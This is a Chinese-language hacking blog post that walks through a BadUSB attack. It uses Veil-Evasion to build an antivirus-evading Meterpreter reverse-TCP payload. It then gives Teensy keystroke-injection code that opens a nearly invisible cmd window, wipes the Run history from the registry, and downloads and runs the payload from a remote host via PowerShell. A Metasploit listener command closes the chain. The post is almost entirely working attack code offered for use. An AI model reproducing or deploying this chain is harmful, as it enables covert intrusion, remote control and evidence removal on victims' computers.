H4rdy's blogs - BadUSB插谁谁怀孕

演示视频
0x1 利用veil编码打造免杀的meterpreter

root@kali:~# veil-evasion //启动veil

[>] Please enter a command: list //查看可选列表

26) python/meterpreter/rev_tcp

[>] Please enter a command: 26 //这里选择编号为26的payload

[>] Please enter a command: set LHOST 192.168.31.233 //设置LHOST

[>] Please enter a command: generate //对payload进行编码
[*] Press [enter] for 'payload'
[>] Please enter the base name for output files: a //输入生成的payload名字

[>] Please enter the number of your choice: 1 //选择编码方式

[*] Executable written to: /root/veil-output/compiled/a1.exe //生成经过编码的payload位置

0x2 将执行代码写入badusb中

void setup() {               //初始化,这里的代码只执行一次
delay(5000);                //设置延时,让系统有足够的时间识别烧鹅,防止后续代码执行错乱。
Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);    // 按下Win键
Keyboard.set_key1(KEY_R);                                      // 同时按下R键
Keyboard.send_now();                                           // 发送Win+R
delay(100);   
Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1"); 

//开启极小的CMD窗口,设置文字和背景对比度尽可能相近,达到隐藏输入的目的
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
delay(300);
Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); //利用注册表清除开始--运行的记录
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now(); 
Keyboard.println("powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.121/1.exe','D:\\1.exe')");   //下载远程的payload
Keyboard.set_key1(KEY_ENTER);                                 
Keyboard.send_now();                                       
Keyboard.set_modifier(0);
Keyboard.set_key1(0);   
Keyboard.send_now();  
delay(3000);                                                    //设置延迟,等待下载完成
Keyboard.println("d:\\1.exe");                                       //执行打开命令
Keyboard.set_key1(KEY_ENTER);
delay(300);   
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.set_key1(KEY_SPACE);
Keyboard.set_key2(KEY_C);
Keyboard.send_now(); 
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.set_key2(0);
Keyboard.send_now();                                              //关闭cmd窗口
    }
   void loop()                                                    //循环,这里的代码无限循环
    {
    }

0x3
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 E //开始监听,等待连接

tagged by none  

1 Comment


  1. 2333333

    233333333

Post a new comment

© H4rdy's blog